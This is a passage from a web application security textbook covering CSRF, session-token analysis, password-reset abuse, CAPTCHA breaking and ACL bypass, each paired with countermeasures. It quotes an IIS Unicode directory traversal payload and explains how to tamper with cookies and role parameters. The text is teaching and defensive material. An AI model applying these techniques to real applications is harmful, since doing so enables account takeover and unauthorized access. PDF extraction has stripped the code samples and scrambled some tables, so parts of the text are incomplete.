decoded, an attacker can decode, modify, and re-encode the cookie value to potentially change his or her assigned role and gain unauthorized access to the application. Tools such as the Burp web proxy have great support for manipulating cookies and encoding, decoding, and hashing values using common algorithms. Countermeasures to Token Replay Attacks Eavesdropping is the easiest way to steal security tokens like cookies. SSL or other appropriate session confidentiality technologies should be used to protect against eavesdropping attacks. In addition to on-the wire eavesdropping, be aware that there are a slew of security issues with commonly used web clients that may also expose your security tokens to malicious client-side malware or cross-site scripting manipulation (see Chapter 9 for more on this). In general, the best approach is to use a session identifier provided by the application server. However, if you need to build your own, you should also design a token that can’t be predicted and can’t be practically attacked using brute-force methods. For example, use a random number generator of sufficient entropy to generate session identifiers. In addition, to prevent brute-force attacks, use a session identifier with a large enough key space (roughly 128 bits with current technology) that it can’t be attacked using brute-force. Keep in mind there are subtleties with pseudorandom number generators that you must consider when using them. For example, concatenating four randomly generated 32-bit integers to create a single 128-bit session identifier is not as secure as randomly generating a single 128-bit value using a cryptographically secure PRNG. By providing four samples to prevent brute-force attacks, you actually make session ID prediction easier. You should also implement integrity checks across security tokens like cookies and session IDs to protect against tampering at the client or during transit. Tampering can be prevented by using hashed message authentication codes (HMACs) or by simply encrypting the entire cookie value. In general, storing sensitive data in a client-side security token is not recommended, even if you implement strong confidentiality and integrity-protection mechanisms. Cross-site Request Forgery Cross-site request forgery (often abbreviated as XSRF or CSRF) is a web application attack that leverages the existing trust relationship between web applications and authenticated users to force those users to commit arbitrary sensitive transactions on the behalf of an attacker. In security literature, this attack is often classified as one manifestation of a confused deputy attack. The deputy in this case is the web application client browser 154 Hacking Exposed Web Applications and confused simply refers to the inability of the browser to properly distinguish between a legitimate and unauthorized request. Despite the extremely dangerous nature of XSRF attacks, these attacks have received less attention than the more easily understood web application vulnerabilities such as XSS. As recently as 2006, XSRF attacks were referred to as a “sleeping giant,” and listing in the OWASP Top 10 project was not achieved until the year 2007. Even at the time of this writing, XSRF vulnerabilities are being actively reported against popular application web sites. The reader might be wondering then, if XSRF vulnerabilities present such a significant risk, why, until now, have they received such little attention? While opinions certainly vary on this question, part of the reason undoubtedly has to do with how inherent this vulnerability is to the stateless nature of the HTTP specification that requires an authentication token (usually a combination of a session ID cookie and additional authorization tokens) be sent with every request. Common sense dictates that security vulnerabilities are generally caused by mistakes application developers make during design and development or administrators make in deployment. Contrary to this, XSRF vulnerabilities occur when developers simply omit an XSRF prevention mechanism from their application. In other words, if developers have not actively defended against this issue and their application supports sensitive authenticated transactions, then the application is usually vulnerable, by default, with a few exceptions. So what constitutes an XSRF attack? The classic example is that of a banking application that permits users to transfer funds from one account to another using a simple HTTP GET request. Assume the transfer account action takes the following form: toaccount 12345&funds 1000.00¤cy dollars Continuing with the above example, assume an attacker creates a malicious HTML page on a system under her control containing the following JavaScript code: The effect of this JavaScript code is to create a dynamic HTML image tag (), and set the source to that of the funds transfer action on the vulnerable banking application. Client browsers of users authenticated with the banking web site that are lured into visiting the malicious page will execute the attacker’s JavaScript to create a background HTTP GET request for the source of the dynamic image, which, in this case, is the funds transfer action, and that action will be executed just as if the user had willingly performed it. The key to remember here is that whenever a browser makes a request to a resource on another domain, any cookies associated with that domain, port, Chapter 4: Attacking Web Authentication 155 and path will automatically be attached to the HTTP header and sent along with the request. This includes, of course, session cookies used to identify the authenticated user to the application. The result is that the attacker has successfully forced a banking user to transfer funds from the user’s account to the attacker’s account. While this example is somewhat contrived and serves to merely illustrate the fundamental issue, similar vulnerabilities have been reported against live systems that could result in heavy financial loss for the vulnerable organization. For example, in 2006, it was reported on the security mailing list Full Disclosure that Netflix was vulnerable to cross-site request forgery issues that, according to David Ferguson who originally disclosed the vulnerability, could result in the following: • Adding movies to his rental queue • Adding a movie to the top of his rental queue • Changing the name and address on the account • Enabling/disabling extra movie information • Changing the e-mail address and password on the account • Cancelling the account (unconfirmed/conjectured) Fortunately, the Netflix vulnerability was disclosed before any real damage was inflicted. However, as can be seen from the list of actions this vulnerability made possible, the potential damage, both in terms of real financial loss and damage to Netflix’s brand, of a successful attack against the Netflix userbase simply cannot be understated. It should be noted that while the example used to illustrate this issue was an HTTP GET request, HTTP POST requests are also vulnerable. Some developers appear to be under the misapprehension that simply changing vulnerable GET requests to POST will be sufficient to remediate XSRF vulnerabilities. However, this only makes life for attackers slightly more difficult as now they have to construct JavaScript to construct and POST the form automatically. In order to prevent the browser from automatically redirecting the victim user to the vulnerable application when the POST is submitted, the JavaScript can be embedded in a hidden iframe tag in the malicious page. As a general application design rule, any action with consequence should be constructed using a HTTP POST request. Countermeasures to Cross-site Request Forgery Attacks There are primarily three common methods for preventing XSRF attacks: • Double-posted cookie In the double-posted cookie mitigation technique, each form used to commit a sensitive transaction is generated with a hidden input field containing the value of the current user’s session ID or other securely generated random value stored in a client-side cookie. When the form is posted, the application server will check if the cookie value in the form matches the value received in the HTTP request header. If the values do not match, the request will be rejected as invalid and an audit log will be generated to record 156 Hacking Exposed Web Applications the potential attack. This method relies on the attacker not knowing the client session cookie value. If that value is disclosed through another channel, this strategy will not be successful (and session hijacking attacks will also become a concern). • Unique form nonce The unique form nonce remediation strategy is perhaps the most common method for preventing XSRF attacks. In this method, each form is constructed per request with a single hidden input field containing a securely generated random nonce. The nonce has to be generated using a cryptographically secure pseudorandom number generator, or it could be vulnerable to attack. When the application server receives the form parameter values as part of an HTTP POST request, it will compare the value of the nonce with the value stored in memory and reject the request as invalid should the values differ or should the nonce have timed out. This method can be tricky to implement if the application requires generating and associating nonce and nonce timeout values for each request containing a sensitive transaction form. Some development frameworks implement routines that provide similar functionality out-of-the-box, for example, Microsoft’s ASP.NET ViewState feature that persists changes to the state of a form across postbacks. • Require authentication credentials This remediation method requires authenticated users to reenter the password corresponding to their authenticated session whenever performing a sensitive transaction. This strategy is common in web applications that have a few sensitive rare transactions. Common areas of an application secured in this fashion are user profile data update forms. Care should be taken to include audit and lockout functionality on these pages to prevent XSRF authentication brute-forcing attacks that attempt to update profile data by repeatedly forcing requests with randomly guessed passwords. To illustrate how the banking transfer funds action would be remediated using the unique form nonce solution described, consider the following form action: Notice how an additional hidden parameter, xsrfToken, has been added to the form. A new xsrfToken value is randomly generated using a cryptographically secure pseudorandom number generator each time a request for the corresponding page is made. Because the attacker does not have knowledge of this value, he or she will be unable to create a malicious form to forge transfer funds transactions. Chapter 4: Attacking Web Authentication 157 Developers should also familiarize themselves with platform-specific built-in XSRF prevention technologies when deciding how to approach this issue, as the availability of such a solution can greatly reduce the amount of work they have to do to secure their applications. In general, however, platform-specific technologies will use one of the strategies mentioned previously (most likely, the unique form nonce). More detailed information regarding XSRF mitigation techniques can be found in the pages listed in the “References & Further Reading” section at the end of this chapter. Identifying Cross-site Request Forgery Vulnerabilities Given knowledge of the remediation strategies listed in the previous section, identifying XSRF vulnerabilities in web applications is a trivial activity. If the application form under consideration contains a unique nonce, difficult-to-guess cookie value, or parameter requiring an authentication credential, then the form is not vulnerable to XSRF. However, if the form contains no values that cannot be easily guessed by the attacker, then the attacker can reconstruct the form on a third-party site and execute XSRF attacks. Identity Management A functional authentication system needs to have some way of managing identities— registration, account management (such as password reset), and so on. These activities also need to be performed securely because errors can impact very sensitive information like credentials. Unfortunately, identity management can be a complex task, and many web applications don’t perform it very well, leaving their authentication system exposed to abuse and bypass. In this section, we’ll talk about common attacks against identity management. Some web sites seek to avoid the headache of identity management entirely by outsourcing it to a third party. Microsoft’s Windows Live ID is an example of such a service for the Web—see our previous discussion of Live ID for more information. User Registration Attacks Sometimes, the easiest way to access a web application is to simply create a valid account using the registration system. This method essentially bypasses attacks against the authentication interface by focusing on the registration process. Of course, filtering account registrations for malicious intent is a challenging proposition, but web applications have developed a number of mechanisms to mitigate against such activity, including Completely Automated Public Turing Tests to Tell Computers and Humans Apart (CAPTCHA). CAPTCHAs are often used in web-based applications when the application owner wants to prevent a program, bot, or script from performing a certain action. Some examples of CAPTCHA include these: • Free e-mail services Many free e-mail services use CAPTCHA to prevent programs from creating fake accounts, generally to minimize spam. 158 Hacking Exposed Web Applications • Password-guessing attack prevention CAPTCHA has been used in login pages to prevent tools and programs from executing automated passwordguessing attacks. • Search engine bot prevention CAPTCHAs are sometimes used to prevent search engine bots from indexing pages. • Online polls CAPTCHA can be an effective way to prevent people from skewing results of online polls by ensuring that a program is not responding to the polls. CAPTCHA is a type of Human Interactive Proof (HIP) technology that is used to determine if the entity on the other side is a human or a computer. This is formally referred to as a Reverse Turing Test (RTT). The difference with CAPTCHA is that it is “completely automated,” which makes it suitable for use in web applications. Common types of CAPTCHA are often based on text recognition or image recognition. The following images illustrate common implementations of CAPTCHAs. The following shows the Gimpy-r CAPTCHA, which is considered ineffective since automated routines can beat it regularly: Next shown is a CAPTCHA used to challenge registrations. Note the audio CAPTCHA option button in the upper right: Next is a graphical CAPTCHA from Chapter 4: Attacking Web Authentication 159 Recent advances and research in computer vision and image recognition have provided the groundwork for breaking CAPTCHA. Simple CAPTCHAs like the EZGimpy technology using text recognition has been broken by Greg Mori and Jitendra Malik, researchers at the University of California at Berkeley. Gabriel Moy, Nathan Jones, Curt Harkless, and Randy Potter of Areté Associates have created a program that has broken the more complex Gimpy-r algorithm 78 percent of the time. As of this writing, the PWNtcha is the most successful of the CAPTCHA decoders. It has over an 80 percent success rate at breaking well-known CAPTCHAs used by popular web sites such as PayPal and Slashdot. Although the code is not released, you can upload a CAPTCHA to the web site for decoding. Figure 4-7 shows an example of using PWNtcha. Although most researchers have not released programs that break CAPTCHA, the hackers are not far behind the researchers. The authors have worked with several companies that have been victims of hackers creating bots that automatically register accounts. Their response was to use a CAPTCHA. However, within a week, the hackers were able break the CAPTCHA, probably adapting a program they already had in their arsenal. The advances in computer vision and processing power has required more complex CAPTCHAs to be developed to be effective. In some instances, criminal organizations have avoided the complexity of using automation and have simply begun employing the use of humans to break CAPTCHAs. Credential Management Attacks Another way to bypass authentication is to attack credential management subsystems. For example, most web sites implement common mechanisms for password recovery, such as self-help applications that e-mail new passwords to a fixed e-mail address, or if a “secret question” can be answered (for example, “What is your favorite pet’s name?” or “What high school did you attend?”). 160 Hacking Exposed Web Applications Figure 4-7 PWNtcha successfully identifying the type of CAPTCHA and the text in the image We’ve found in our consulting that many of these so-called secret questions are easily guessable and often not considered a “secret.” For example, we once stumbled on a secret question designed to elicit the user’s customer ID and ZIP code in order to recover a password, where the customer ID was sequential and the ZIP code was easily guessed using a dictionary of common ZIP codes or via brute-force mechanisms. Another classic attack against password reset mechanisms is getting self-help password reset applications to e-mail password reset information to inappropriate e-mail addresses. Even the big guys fall to this one, as an incident in May 2003 with Microsoft’s Passport Internet authentication services showed (as noted earlier, Passport is now called “Windows Live ID,” but we will refer to it by its prior name in the context of earlier attacks against the service as it was called at the time). Passport’s self-help password Chapter 4: Attacking Web Authentication 161 reset application involved a multistep process to e-mail the user a URL that permitted the user to change his or her password. The URL in the e-mail looked something like the following (manual line breaks have been added due to page-width constraints): prefem 1 Although the query string variables here are a bit cryptic, the emailpwdreset application in this example will send a password reset URL for the “victim@hotmail. com” account to the e-mail address “” Subsequently, “attacker” will be able to reset the password for “victim,” thus compromising the account. Client-side Piggybacking We’ve spent most of our effort in this chapter describing ways to steal or otherwise guess user credentials for the attacker to use. What if the attacker simply lets the user do all of the heavy lifting by piggybacking on a legitimately authenticated session? This technique is perhaps the easiest way to bypass nearly all of the authentication mechanisms we’ve described so far, and it takes surprisingly little effort. Earlier in this chapter, we cited an essay by Bruce Schneier on this very point, in which he notes that man-in-the-middle attacks and malicious software installed on end-user machines can effectively bypass almost any form of remote network authentication (you can find a link to his essay in the “References & Further Reading” section in this chapter). We’ll describe some of these methods in detail in Chapter 9, but we thought it important to make this point before we closed out this chapter. SOME FINAL THOUGHTS: IDENTITY THEFT Identity theft via Internet fraud tactics such as phishing continues to make the media rounds as we write these pages. Like many issues surrounding security, this high profile creates the expectation that technology will magically save the day at some point. New authentication technologies in particular are held out as the silver bullet for the problems of identity theft. Perhaps someone will invent the perfectly secure and easy-to-use authentication protocol someday, but in the interim, we wanted to decry what we believe to be a much more easily addressed factor in identity theft: the widespread use of personally identifiable information (PII) in web authentication and identity management. Most of us have experienced the use of facts about our personal lives to authenticate us to online businesses: government identification (such as Social Security Number, SSN), home addresses, secret questions (“What high school did you attend?” and so on), birthdates, and on and on. 162 Hacking Exposed Web Applications As Internet search engines like Google and incidents like the 2005 CardSystems security breach are now making plainly obvious, many of these personal factoids are not really that secret anymore. Combined with the prevalence of social networking, these factors make so-called personal information into the least secret aspects of our lives (are you listening, Paris Hilton?) and, therefore, a terrible authenticator. So we’d like to make a simple demand of all of those businesses out there who may be listening: quit collecting our PII and don’t even think about using it to authenticate us! SUMMARY Authentication plays a critical role in the security of any web site with sensitive or confidential information. Table 4-2 summarizes the authentication methods we have discussed in this chapter. Web sites have different requirements, and no one method is best for authentication. However, using these basic security design principles can thwart many of the attacks described in this chapter: • A strong password policy and account lockout policy will render most attacks based on password guessing useless. • Ensure that all sections of the application requiring authentication are actually covered by the authentication component and that authentication cannot be bypassed by brute-forcing to the resource. • Do not use personally identifiable information for credentials! They aren’t really secret, and they expose your business to liability if you store them. • HTTPS should be used to protect authentication transactions from the risk of eavesdropping and replay attacks. • Input validation goes a long way in preventing hacking on a web site. SQL injection, script injection, and command execution can all be prevented if input validation is properly performed. • Ensure that authentication security tokens like session identifiers aren’t easily predictable and that they are generated using a sufficiently large key space that cannot easily be guessed. • Do not allow users to preset session IDs prior to authentication (the server should always generate these values), and always issue a new session ID upon successful authentication. • Do not forget to harden identity management systems like account registration and credential reset, as weaknesses in these systems can bypass authentication controls altogether. Chapter 4: Attacking Web Authentication 163 Authentication Method Forms-based Basic Digest SiteKey One-time password Integrated Windows Certificate Security Level Depends on implementation Low Medium High High High High Server Requirements Supports HTTP methods GET and/or POST Valid accounts on server Valid accounts with cleartext password available Custom software integration Custom software integration Valid Windows accounts Server certificate issued by same authority as client certificates Client Requirements Supports HTTP methods GET and/or POST Most popular browsers support Most popular browsers support Browser, devices must be registered for two-factor authentication Requires outboard device Most popular browsers (may need add-on) support SSL support, client-side certificate installed Comments The security of Forms-based authentication depends on the security of its implementation. Transmits password in cleartext. Usable across proxy servers and firewalls. Offers server authentication to mitigate phishing. Client devices, distribution costs. Becoming more popular due to browser support. Certificate distribution can be an issue at scale. Table 4-2 A Summary of the Web Authentication Mechanisms Discussed So Far 164 Hacking Exposed Web Applications REFERENCES & FURTHER READING Reference Relevant Security Advisories RUS-CERT Advisory 2001-08:01 vulnerabilities in several Apache authentication modules CardSystems security breach exposes millions of credit cards Freeware Tools Burp Web Proxy Digest::MD5 Perl module by Neil Winton MDcrack by Gregory Duchemin NTLM Authentication Proxy Server (APS) WebCracker BrutusAET2 Hydra SideJacking with Hamster CAPTCHA Links The CAPTCHA Project (covers Gimpy, Bongo, Pix, and Sounds) PWNtcha, a CAPTCHA decoder Microsoft Live ID/Passport References Microsoft Live ID homepage “Risks of the Passport Single Signon Protocol” Chris Shiflett’s “Passport Hacking” Chris Shiflett’s “Passport Hacking Revisited” Mark Slemko’s “Passport to Trouble” FTC Consent Decree with Microsoft Passport Link auth.php security+breach sidejacking-with-hamster_05.html -revisited microsoftagree.pdf Chapter 4: Attacking Web Authentication 165 Reference Passport emailpwdreset vulnerability Liberty Alliance Project OpenID OpenID 2.0: Security Considerations OpenID Being Balkanized even as Google, Microsoft Sign On Beginner’s Guide to OpenID Phishing Windows CardSpace The Laws of Identity On the Insecurity of Microsoft’s Identity Metasystem CardSpace Students enlist reader’s assistance in CardSpace “breach” Strong Authentication Technologies Bank of America PassMark implementation called SiteKey One-time Password specifications RSA’s SecureID OTP implementation E*Trade Online Security, with RSA Secure ID information “Two-Factor Authentication: Too Little, Too Late,” by Bruce Schneier, critiques OTP and other two-factor systems General References The World Wide Web Security FAQ Section 5, “Protecting Confidential Documents at Your Site” RFC 2617, “HTTP Authentication: Basic and Digest Access Authentication” RFC 2478, SPNEGO Link news/2008/10/openid-being-balkanized-even-asgoogle-microsoft-sign-on.ars ms996456.aspx passmark .txt?number=2478 166 Hacking Exposed Web Applications Reference IIS Authentication “Digest Authentication in IIS 6.0 ” Configure Digest Authentication (IIS 7) Login Type Codes Revealed “NTLM Authentication Scheme for HTTP” by Ronald Tschalär “How to Disable LM Authentication on Windows NT” (Q147706) “Using Forms Authentication in ASP.NET” “Brute Force Exploitation of Web Application Session IDs” by David Endler GNUCitizen: Why HTTPOnly Won’t Protect You OWASP: LDAP Injection OWASP: Session Fixation Full Disclosure – Advisory: Weak RNG in PHP Session ID Generation Leads to Session Hijacking OWASP: Cross-site Request Forgery Cross-site Request Forgery White Paper Cross-site Request Forgery: A “Sleeping Giant” IE8 Security Part VII: Clickjacking Defenses Link aa292114%28VS.71%29.aspx prodtechnol/WindowsServer2003/Library/ IIS/809552a3-3473-48a7-9683-c6df0cdfda21 .mspx?mfr=true cc754104%28WS.10%29.aspx Logon-Types.html ntlm.html Fixation Request_Forgery_%28CSRF%29 whitepapers/csrf_cross_site_request_forgery.html ie8-security-part-vii-clickjacking-defenses.aspx 5 AAtuttahcokrinizgatWieobn 168 Hacking Exposed Web Applications We just saw in Chapter 4 how authentication determines if users can log into a web application. Authorization determines what parts of the application authenticated users can access, as well as what actions they can take within the application. Since the stateless HTTP protocol lacks even the most basic concept of discrete sessions for each authenticated user, web authorization is challenging to implement and consequently profitable to attack. We will sometimes abbreviate authentication as “authn,” and authorization as “authz.” Authorization is classically implemented by providing the authenticated user’s session with an access token that uniquely identifies him or her to the application. The application then makes decisions about whether to grant or deny access to an internal object based on a comparison of identifiers within the token and access control list (ACL) on the object. If the provided identifiers match the configured permission on the object, access is granted; if there is no match, access is denied. The token, effectively acting as a persistent re-authentication mechanism, is provided with each request and obviates the need for a user to continually and manually re-authenticate. Upon logout or session timeout, the token is typically deleted, expired, or otherwise invalidated. Often the identifier used to distinguish unique sessions, commonly called a session ID, is the same thing as the access token. It is usually stored within a cookie. HTTP Basic authn takes the old-fashioned approach—it submits the Base64–encoded username:password in the HTTP Authorize header for every request in the same realm. Clearly, access tokens provide great convenience for the user, but as always, convenience comes at a price. By guessing, stealing, or otherwise replaying someone else’s token, a malicious hacker might be able to impersonate another user by viewing data or executing transactions on behalf of the targeted user (horizontal privilege escalation), or even targeted administrators (vertical privilege escalation). When server-side authorization vulnerabilities do occur, they are often the result of improperly defined ACLs or software bugs in the business logic and authorization checks that determine access to application resources and functionality. Attackers targeting application authorization functionality will concentrate their efforts on one of two goals: hijacking valid authorization/session tokens used by the application and/or bypassing server-side ACLs. This chapter is organized primarily around these two aspects of authz and is divided into the following major sections: • Fingerprinting authz • Attacking ACLs • Attacking tokens • Authz attack case studies • Authz best practices Chapter 5: Attacking Web Authorization 169 In many ways, authorization is the heart and soul of any system of security controls, and as you may agree by the end of this chapter, no web application can survive having it excised by a skillful adversary. FINGERPRINTING AUTHZ Web application authorization can be complex and highly customized. Methodical attackers will thus seek to “fingerprint” the authz implementation first in order to get the lay of the land before launching overt attacks. Crawling ACLs The easiest way to check the ACLs across a site is to simply crawl it. We discussed web crawling techniques in Chapter 2, including several tools that automate the process (these are sometimes called offline browsers since they retrieve files locally for later analysis). We’ll introduce an additional web crawler here called Offline Explorer Pro (from MetaProducts Software Corp.) because it provides better visibility into web ACLs than the ones discussed in Chapter 2. Like most web crawlers, the operation of Offline Explorer Pro (OEP) is straightforward—simply point it at a URL and it grabs all linked resources within a specified depth from the provided URL. The interesting thing about OEP is that it displays the HTTP status code that it receives in response to each request, permitting easy visibility into ACLs on files and folders. For example, in Figure 5-1, OEP’s Download Progress pane shows an Error: 401 Unauthorized response, indicating that this resource is protected by an ACL and requires authentication. OEP also natively supports most popular web authn protocols (including Windows NTLM and HTML forms), which makes performing differential analysis on the site easy. Differential analysis involves crawling the site using unauthenticated and authenticated sessions, or sessions authenticated as different users, in order to reveal which portions are protected and from which users. The authentication configuration option in OEP may be a bit hard to find—it’s located on the Project Properties page for a given project (File | Properties), under the Advanced category, labeled “Passwords.” This is shown in Figure 5-2. For command-line junkies, OE.exe can take parameters via the command line. The only real drawback to web crawling is that this approach only “sees” portions of the web site that are linked from other pages. Thus, you may not get a complete picture (for example, the hidden “admin” page may not be linked from any of the site’s main pages and thus be invisible to the crawler). Of course, as we noted in Chapter 2, automated crawling provides a great head start on more rigorous manual analysis, which has a better chance of turning up such hidden content. 170 Hacking Exposed Web Applications Figure 5-1 Offline Explorer Pro lists HTTP status codes in the Download Progress pane, indicating resources that might be protected by ACLs. Identifying Access Tokens Access tokens (or session IDs) are often easy to see within web application flows; sometimes they are not, however. Table 5-1 lists information commonly found access tokens, along with common abbreviations, to give the reader an idea of what we’ll be looking for in later sections. COTS Session IDs Many common off-the-shelf (COTS) web servers have the capability to generate their own pseudorandom session IDs. Table 5-2 lists some common servers and their corresponding session-tracking variables. The IDs generated by more modern servers are generally Chapter 5: Attacking Web Authorization 171 Figure 5-2 Offline Explorer Pro’s authentication configuration screen random enough to preclude guessing attacks, although they are all vulnerable to replay (we’ll discuss each of these in the upcoming section on attacking tokens). Session Attribute Username User Identifier User Roles User Profile Shopping Cart Session Identifier Common Abbreviation username, user, uname, customer id, *id, userid, uid, *uid, customerid admin=TRUE/FALSE, role=admin, priv=1 profile, prof cart, cartid session ID, sid, sessid Table 5-1 Information Commonly Stored in a Web Application Access/Session Token 172 Hacking Exposed Web Applications Server Type IIS J2EE-based servers PHP Apache ColdFusion Other Servers Server Session ID Variable Names ASPSESSIONID JSESSIONID PHPSESSID SESSIONID CFID CFTOKEN JSESSIONID (runs on top of J2EE) JServSessionID JWSESSIONID SESSID SESSION SID session_id Table 5-2 Some Common Off-the-Shelf Session IDs Analyzing Session Tokens OK, you’re fingerprinting a web application’s authorization/session management functionality, and you’ve identified a value that is probably the session token, but it’s a visually indecipherable blob of ASCII characters or a jumbled numeric value that offers no immediate visual cues as to how it’s being used. Surrender and move on? Of course not! This section discusses some approaches to determining what you’re up against. Even though the session data may not immediately appear to be comprehensible, a little extra analysis (backed by lots of experience!) can reveal subtle clues that, in fact, enable calculated guessing. For example, some session components tend to be quite predictable because they have a standard format or they behave in a predictable fashion. A datestamp, for example, could be identified by values in the token that continuously increment. We list several common attacks against such deterministic items in Table 5-3. Use the GNU date +%s command to view the current epoch time. To convert back to a humanreadable format, try the Perl command: perl e 'use Time::localtime; print ctime()' Analyzing Encoding and Encryption Visually indecipherable blobs of ASCII characters usually mean one of two things: encoding or cryptography is at work. If the former, there is a ray of sunlight. If the latter, your best effort may only allow minimal additional insight into the function of the application. Chapter 5: Attacking Web Authorization 173 Session Component Time- and datestamp Incrementing number User profile Server IP address Client IP address Salt value Identifying Features Possible Attacks Constantly changes, even if encoded. A literal string, or a number in a 10-digit epoch format. Changes monotonically with each request. Encoded forms of known values: first/last name, address, etc. Four bytes; e.g., could be either 0xC0A80001 (big endian) or 0x0100A8C0 (little endian). Same as server IP address. May change with each request, may change with each session, or may remain static. Changing this value could extend a login period. Replay attacks may depend on this. Changing this value could lead to session hijacking. Session hijacking. Changing this value would probably break the session, but it helps map out the web server farm. Possible dependency for replay attack session hijacking. Collecting several of these values could lead to guessing secret keys used by the server to encrypt data. Table 5-3 Common Session Token Contents Defeating Encoding Base64 is the most popular encoding algorithm used within web applications. If you run into encoding schemes that use upper- and lowercase Roman alphabet characters (A–Z, a–z), the numerals (0–9), the + and / symbols, and that end with the = symbol, then the scheme is most likely Base64. Numerous encoder/decoder tools exist. For example, the Fiddler HTTP analysis tool discussed in Chapter 1 comes with a utility that will encode/decode Base64, URL, and hexadecimal formats. Burp and the other popular HTTP proxy applications also support encoding and decoding of data in various formats. If you want to write your own Base64 handler, such as for automated session analysis, Perl makes it simple to encode and decode data in Base64. Here are two Perl scripts (actually, two effective lines of Perl) that encode and decode Base64: #!/usr/bin/perl # # encode to base 64 use MIME::Base64; print encode base64($ARGV[0]); 174 Hacking Exposed Web Applications Here’s the decoder: #!/usr/bin/perl # # decode from base 64 use MIME::Base64; print decode base64($ARGV[0]); Analyzing Crypto Web applications may employ encryption and/or hashing to protect authorization data. The most commonly used algorithms are not trivially decoded, as with Base64. However, they are still subject to replay and fixation attacks, so the attacker may find it helpful to identify hashed or encrypted values within a token. For example, the popular hashing algorithm, MD5, is commonly used within web applications. The output of the MD5 algorithm is always 128 bits. Consequently, MD5 hashes can be represented in three different ways: • 16-byte binary digest Each byte is a value from 0 to 255 (16 ×8 = 128). • 32-character hexadecimal digest The 32-character string represents a 128-bit number in hexadecimal notation. Each hexadecimal character represents 4 bits in the 128-bit MD5 hash. • 22-byte Base64 digest The Base64 representation of the 128 bits. An encrypted session token is hard to identify. For example, data encrypted by the Data Encryption Algorithm (DES) or Triple-DES usually appear random. There’s no hardand-fast rule for identifying the algorithm used to encrypt a string, And there are no length limitations to the encryption, although multiples of eight bytes tend to be used. We’ll talk more about attacking crypto later in this chapter. Analyzing Numeric Boundaries When you identify numeric values within session IDs, identifying the range in which those numbers are valid can be beneficial. For example, if the application gives you a session ID number of 1234567, what can you determine about the pool of numbers that make a valid session ID? Table 5-4 lists several tests and what they can imply about the application. The benefit of testing for a boundary is that you can determine how difficult it would be to launch a brute-force attack against that particular token. From an input validation or SQL injection point of view, it provides an extra bit of information about the application’s underlying structure. Differential Analysis When it is not clear what values are important for determining authz decisions, an approach known as differential analysis can often be of use. The technique is very simple: Chapter 5: Attacking Web Authorization 175 Numeric Test Submit various length values consisting of all 9s (e.g., 999, 9999, 99999…). [–128, 127] [0, 255] [–32768, 32767] [0, 65535] [–2147483648, 2147483647] [0, 4294967295] What a Successful Test Could Mean If you have a string of 20 numbers, then the application is most likely using a string storage type. The session token uses an 8-bit signed integer. The session token uses an 8-bit unsigned integer. The session token uses a 16-bit signed integer. The session token uses a 16-bit unsigned integer. The session token uses a 32-bit signed integer. The session token uses a 32-bit unsigned integer. Table 5-4 Numeric Boundaries you essentially crawl the web site with two different accounts and note the differences, such as where the cookies and/or other authorization and state-tracking data differ. For example, some cookie values may reflect differences in profiles or customized settings. Other values, ID numbers for one, might be close together. Still other values might differ based on the permissions for each user. We provide a real-world example of differential analysis in the “Authorization Attack Case Studies” section later in this chapter. Role Matrix A useful tool to aid the authorization audit process is a role matrix. A role matrix contains a list of all users (or user types) in an application and corresponding access privileges. The role matrix can help graphically illustrate the relationship between access tokens and ACLs within the application. The idea of the matrix is not necessarily to exhaustively catalog each permitted action, but rather to record notes about how the action is executed and what session tokens or other parameters the action requires. Table 5-5 has an example matrix. 176 Hacking Exposed Web Applications Role View Own Profile Modify Own Profile View Other’s Profile Delete User User /profile/view.asp?UID= TB992 /profile/update.asp?UID= TB992 n/a n/a Admin /profile/view.asp?UID= MS128 /profile/update.asp?UID= MS128 /profile/view.asp?UID= MS128&EUID=TB992 /admin/deluser. asp?UID=TB992 Table 5-5 An Example Role Matrix The role matrix is similar to a functionality map. When we include the URIs that each user accesses for a particular function, patterns might appear. Notice how the example in Table 5-5 shows that an administrator views another user’s profile by adding the EUID parameter. The matrix also helps identify where session information, and consequently authorization methods, are being handled. For the most part, web applications seem to handle session state in a consistent manner throughout the site. For example, an application might rely solely on cookie values, in which case the matrix might be populated with cookie names and values such as AppRole=manager, UID=12345, or IsAdmin=false. Other applications may place this information in the URL, in which case the same value shows up as parameters. Of course, these are examples of how insecure applications might make authz decisions based on user-supplied data. After all, when an application expects the user to tell it important authz-related information, such as whether he or she is an administrative user or not, then something is quite seriously wrong with the implementation of the authz component. Boolean flags such as IsAdmin, role name parameters like AppRole, and sequential user ID values should always be treated as highly suspect. Secure applications will typically encrypt this information in an authz cookie to prevent tampering, or not store the role-related data on the client at all. In fact, not storing the role-related data on client machines is often the safest approach as it both prevents tampering and replay attacks. The role matrix helps even more when the application does not use straightforward variable names. For example, the application could simply assign each parameter a single letter, but that doesn’t preclude you from modifying the parameter’s value in order to bypass authorization. Eventually, you will be able to put together various attack scenarios—especially useful when the application contains many tiers of user types. Next, we’ll move on to illustrate some example attacks against web application authorization mechanisms. Chapter 5: Attacking Web Authorization 177 ATTACKING ACLS Now that we know what the authorization data is and where it sits, we can ask, “How is it commonly attacked?” We discuss ACL attacks first because they are the “lowest common denominator” of web application authz: all web applications to some degree rely on resource ACLs for protection, whereas not all web apps implement access/session tokens (many apps achieve essentially the same effect via local account impersonation). Put another way, ACL attacks are the most straightforward to attack, while successfully compromising authz and session tokens often involves more work and good fortune. Generally speaking, the easiest authz vulnerabilities to identify are those related to weak ACLs. As noted in Chapter 1, the relatively straightforward syntax of the URI makes crafting arbitrary resource requests, some of which may illuminate hidden authorization boundaries or bypass them altogether, really easy. We’ll discuss some of the most commonly used URI manipulation techniques for achieving this next. Directory Traversal Directory traversal attacks are one common method by which application ACLs can be bypassed to obtain unauthorized access to restricted directories. Directory traversal attacks are characterized by the use of the characters “../” (dot-dot-slash) used in filesystem navigation operations to traverse “up” from a subdirectory and back into the parent directory. One infamous example of this vulnerability in the real world was the well-publicized Unicode and Double Decode attack in 2001 that took advantage of a weakness in the IIS web application server’s parsing and authorization engine. The Unicode variant of this vulnerability was exploited as follows: Normally, IIS blocks attempts to escape the web document root with dot-dot-slash URLs such as “/scripts/../../../../winnt”. However, it was discovered that this authz check could be bypassed due to a canonicalization bug that failed to properly handle Unicode representations of the slash character “/” such as “%c0%af” (URL-encoded). This resulted in malicious users being able to access objects outside the document root with specially constructed URLs such as “/scripts/..%c0%af..%c0%af..%c0%afwinnt”. “Hidden” Resources Careful profiling of the application (see Chapter 2) can also reveal patterns in how application folders and files are named. For example, if a /user/menu directory exists, then one could posit that an /admin/menu might exist as well. Oftentimes, developers will rely on obfuscation and “hidden” resource locations rather than properly defined and enforced ACLs to protect access to sensitive resources. This makes directory and file name-guessing a profitable way to dig up “hidden” portions of a site, which can be used 